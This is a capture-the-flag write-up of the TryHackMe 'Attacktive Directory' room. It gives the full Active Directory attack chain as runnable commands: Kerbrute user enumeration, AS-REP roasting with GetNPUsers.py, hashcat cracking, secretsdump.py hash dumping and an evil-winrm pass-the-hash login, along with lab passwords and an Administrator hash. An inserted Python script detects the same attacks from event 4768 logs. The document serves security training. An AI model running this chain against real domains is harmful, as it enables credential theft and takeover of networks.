【THM】Attacktive Directory-Practice

The TryHackMe room this write-up follows: https://tryhackme.com/room/attacktivedirectory

Difficulty: Medium

nmap -p- -sC -sV -T4 10.10.245.159


Task 3 Welcome to Attacktive Directory

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

.local

The next step is enumerating the two ports used by AD, *139* and *445*, with enum4linux. The flag -a stands for "all simple enumeration": it gathers the user list, machine list(s), share list, password policy information, group and member lists, and so on.

Task 4 Enumerating Users via Kerberos

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute-force the discovery of users, guess passwords and even password spray.


./kerbrute_linux_amd64 userenum --dc=10.10.245.159 -d=spooky.local userlist.txt


I saved the usernames into another file to make things easier.


Task 5 Abusing Kerberos

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting is possible when a user account has the setting "Does not require Pre-Authentication" enabled. This means that the account does not need to provide valid identification before a Kerberos ticket is requested for that user account.

Impacket has a tool called “GetNPUsers.py” (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

python /opt/impacket/examples/GetNPUsers.py -usersfile validusers.txt -no-pass -dc-ip 10.10.245.159 spookysec.local/


So only *svc-admin* can request a ticket without providing its password. Let's grab the hash we were given and identify its type over at hashcat.net.
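From the defender's side, both the Kerbrute user enumeration in Task 4 and the AS-REP request above leave traces in the domain controller's Security log as event 4768 (Kerberos TGT requested). The following Python is an added example, not part of the original write-up or of the room: it runs over constructed key=value log lines (not real logs from the lab) and flags TGTs issued with Pre-Authentication Type 0, plus bursts of KDC_ERR_C_PRINCIPAL_UNKNOWN (result code 0x6) from one client, which is what a username-guessing run looks like.

```python
import re
from collections import Counter

# Constructed sample lines modelled on Windows Security event 4768, flattened to
# key=value form. Account names match the room; addresses and values are made up.
SAMPLE_4768_EVENTS = [
    "EventID=4768 AccountName=svc-admin ClientAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 AccountName=james ClientAddress=::ffff:10.10.14.5 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 AccountName=backup ClientAddress=::ffff:10.10.14.5 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    # Failed lookups for non-existent principals: PreAuthType and etype are not filled in.
    "EventID=4768 AccountName=nosuchuser1 ClientAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6",
    "EventID=4768 AccountName=nosuchuser2 ClientAddress=::ffff:10.10.14.5 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6",
]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened 4768 line into a dict of its fields."""
    return dict(KV_RE.findall(line))


def is_asrep_roast_candidate(ev):
    # Status 0x0 with Pre-Authentication Type 0 means the KDC returned an AS-REP
    # encrypted with the account's key without any credential check, which is the
    # condition GetNPUsers.py looks for. Ticket etype 0x17 (RC4-HMAC) is the form
    # hashcat mode 18200 cracks, so callers can use it as the highest-signal case.
    return (ev.get("EventID") == "4768"
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0")


def find_asrep_roasting(lines):
    """Return (account, ticket etype, client address) for each roastable AS-REP issued."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_asrep_roast_candidate(ev):
            hits.append((ev["AccountName"], ev["TicketEncryptionType"], ev["ClientAddress"]))
    return hits


def count_unknown_principals(lines):
    """Count 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) failures per client; a spike from one
    address is the footprint of a Kerbrute-style userenum run."""
    counts = Counter()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x6":
            counts[ev["ClientAddress"]] += 1
    return dict(counts)


if __name__ == "__main__":
    print(find_asrep_roasting(SAMPLE_4768_EVENTS))
    print(count_unknown_principals(SAMPLE_4768_EVENTS))
```

A real deployment would read the XML or JSON export of the Security log rather than this flattened form, but the field names and the two conditions are the same.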

The hashcat run failed; to be analysed.

hashcat -m 18200 hash.txt passwordlist.txt


It reports this:

Device #1: Not enough allocatable device memory for this attack.

But I ran it on Windows instead:


management2005

Task 6 Back to the Basics

With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.


smbclient -L 10.10.245.159 -U "svc-admin"


Task 7 Elevating Privileges within the Domain

With our new credentials we can gain higher access. This backup account may be the backup for the whole domain controller, which allows all AD changes (including password hashes) to be synced to this account. We can use a different impacket tool, secretsdump.py, to retrieve all the password hashes we have access to.

python /opt/impacket/examples/secretsdump.py backup:backup2517860@10.10.245.159


A Google search for how NTLM hashes are used for lateral movement turned up this:

https://www.manageengine.com/products/eventlog/cyber-security/pass-the-hash-attack.html?source=post_page-----76731d298c29--------------------------------

gem install evil-winrm

evil-winrm -i 10.10.245.159 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
